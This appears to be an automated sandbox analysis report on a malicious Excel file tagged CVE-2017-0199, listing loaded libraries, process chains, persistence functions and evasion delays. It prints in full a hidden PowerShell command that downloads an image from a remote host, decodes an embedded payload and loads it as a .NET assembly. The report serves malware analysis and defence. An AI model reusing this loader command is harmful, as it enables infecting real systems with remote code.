                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: nlaapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: F9430000.0.dr Initial sample: OLE indicators vbamacros = False
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx Initial sample: OLE indicators encrypted = True

                  Data Obfuscation

                  Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...' [UTF-16 base64-encoded command, garbled by extraction; its decoded form is the next entry]
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 14_2_0041CBE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_0061956A pushad ; retf 8_2_0061956B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_0061CA14 pushad ; retf 0061h 8_2_0061CA15
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00292DAB pushfd ; ret 12_2_00292DB1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00292D8D pushad ; ret 12_2_00292DA1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00292DDD push ebx; ret 12_2_00292DEA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_0029233D pushad ; retf 12_2_00292351
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00292370 pushfd ; retf 12_2_00292379
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00457186 push ecx; ret 14_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0045E55D push esi; ret 14_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00457AA8 push eax; ret 14_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00434EB6 push ecx; ret 14_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_10002806 push ecx; ret 14_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0044693D push ecx; ret 15_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00451D54 push eax; ret 15_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_00451D34 push eax; ret 16_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_00444E71 push ecx; ret 16_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00414060 push eax; ret 17_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00414060 push eax; ret 17_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00414039 push ecx; ret 17_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4

                  Persistence and Installation Behavior

                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\zhort.de@SSL\DavWWWRoot
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File dump: sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc.0.dr
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: F9C7AC5D.doc.3.dr
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00406EEB ShellExecuteW,URLDownloadToFileW, 14_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 14_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 14_2_0041CBE1
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX (5 identical entries in the report)
Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx | Stream path 'Workbook' entropy: 7.99920334828 (max. 8.0)
Source: F9430000.0.dr | Stream path 'Workbook' entropy: 7.99939390641 (max. 8.0)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                  Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040F7E2 Sleep,ExitProcess,14_2_0040F7E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,14_2_0041A7D9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599922
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1107
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3905
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 1660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 8316
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_14-53648
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3128 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2772 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2672 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2948 | Thread sleep count: 1562 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2948 | Thread sleep count: 3905 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1484 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980 | Thread sleep time: -599922s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2908 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760 | Thread sleep count: 1660 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2760 | Thread sleep time: -4980000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3064 | Thread sleep time: -180000s >= -30000s
